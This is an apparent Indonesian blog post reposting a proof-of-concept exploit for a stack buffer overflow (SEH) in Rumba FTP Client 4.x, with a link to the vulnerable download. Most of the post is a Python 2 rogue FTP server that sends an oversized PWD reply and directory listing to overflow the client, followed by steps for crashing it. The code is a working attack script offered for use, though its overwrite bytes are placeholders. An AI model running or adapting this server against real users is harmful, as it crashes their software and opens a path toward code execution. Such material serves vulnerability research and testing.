PoC Rumba FTP Client 4.x – Stack buffer overflow (SEH) Exploit

Silahkan jalankan script berikut,

Sumber : http://0day.today/exploit/26172

Download : Vulnerable APP – http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40307

import socket
import sys
import time

# IP Address
IP = ‘127.0.0.1’ \

# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Bind the socket to the port
server_address = (IP,21)
print “Starting up on %s port %s” % server_address
sock.bind(server_address)

# Listen for incoming connections
sock.listen(1)

# Wait for incoming connection
while True:
print “Waiting for a connection”
connection, client_address = sock.accept()

try:
print “Connection from ” + str(client_address)
# Receive the data in small chunks and restransmit it
connection.send(“220 Welcome\r\n”)

while(True):
data = connection.recv(16)
print “received %s” % data
if “USER” in data:
print “Sending 331”
connection.send(“331 Please specify the password.\r\n”)
if “PASS” in data:
print “Sending 227”
connection.send(“230 Login successful.\n\n”)
if “PWD” in data:
print “Sending 257”

# 77A632E2 add esp,908 pop pop pop ret
# THIS IS THE PART WHERE THE OVERFLOW HAPPENS
connection.send(“257 \”/”+”A”*629+”\x45\x45\x45\x45″+ “\x44\x44\x44\x44” + “D”*185 + “rrrr” + “D”*211 + “\”\r\n”)
if “TYPE A” in data:
print “Sending 200 Switching to ASCII mode.”
connection.send(“200 Switching to ASCII mode.\r\n”)
if “TYPE I” in data:
print “Sending 200 Switching to Binary mode.”
connection.send(“200 200 Switching to Binary mode.\r\n”)
if “SYST” in data:
print “Sending 215”
connection.send(“215 UNIX Type: L8\r\n”)

if “SIZE” in data:
print “Sending 200”
connection.send(“200 Switching to Binary mode. \r\n”)

if “FEAT” in data:
print “Sending 211-Features”
connection.send(“211-Features:\r\n EPRT\r\n EPSV\r\n MDTM\r\n PASV\r\n REST STREAM\r\n SIZE\r\n TVFS\r\n211 End\r\n”)
if “CWD” in data:
print “Sending 250 Directory successfully changed.”
connection.send(“250 Directory successfully changed.\r\n”)

if “PASV” in str(data):
print “Sending 227 Entering Passive Mode (130,161,45,252,111,183)\n\n”
connection.send(“227 Entering Passive Mode (130,161,45,252,111,183)\n\n”)

# Listen on new socket for connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print ‘Socket created’

#Bind socket to local host and port
try:
s.bind((IP, 28599))
except socket.error as msg:
print ‘Bind failed. Error Code : ‘ + str(msg[0]) + ‘ Message ‘ + msg[1]
sys.exit()

print ‘Socket bind complete for PASV on port 28599’

#Start listening on socket
s.listen(10)
print ‘Socket now listening on 28599’

#now keep talking with the client

#wait to accept a connection – blocking call
conn, addr = s.accept()
print ‘Connected with ‘ + addr[0] + ‘:’ + str(addr[1])
time.sleep(1)
print “Sending dir list”
connection.send(“150 Here comes the directory listing.\r\n”)
conn.send(“d”*500+”rwx—— 2 500 500 4096 Nov 05 2007 ” + “A.” + “B”*500 + “\r\n”)

# Send ok to ftp client
connection.send(“226 Directory send OK.\r\n”)

# close the connection
s.close()
conn.close()
break

if “EXIT” in str(data):
print “REC”
connection.send(“Have a nice day!\r\n”)
break
finally:
connection.close()

Setelah itu silahkan install programm yang vulnerable tersebut dan jalankan

1

Masukan di column Address dengan IP Address komputer yang menjalankan script python diatas lalu Click Go.

Tunggu beberapa saat maka program Rumba Client FTP tersebut akan masuk pada status crashed – not responding seperti pada gambar berikut

buffer

0 replies

Leave a Reply

Want to join the discussion?
Feel free to contribute!

Leave a Reply

Your e-mail address will not be published. Required fields are marked *

*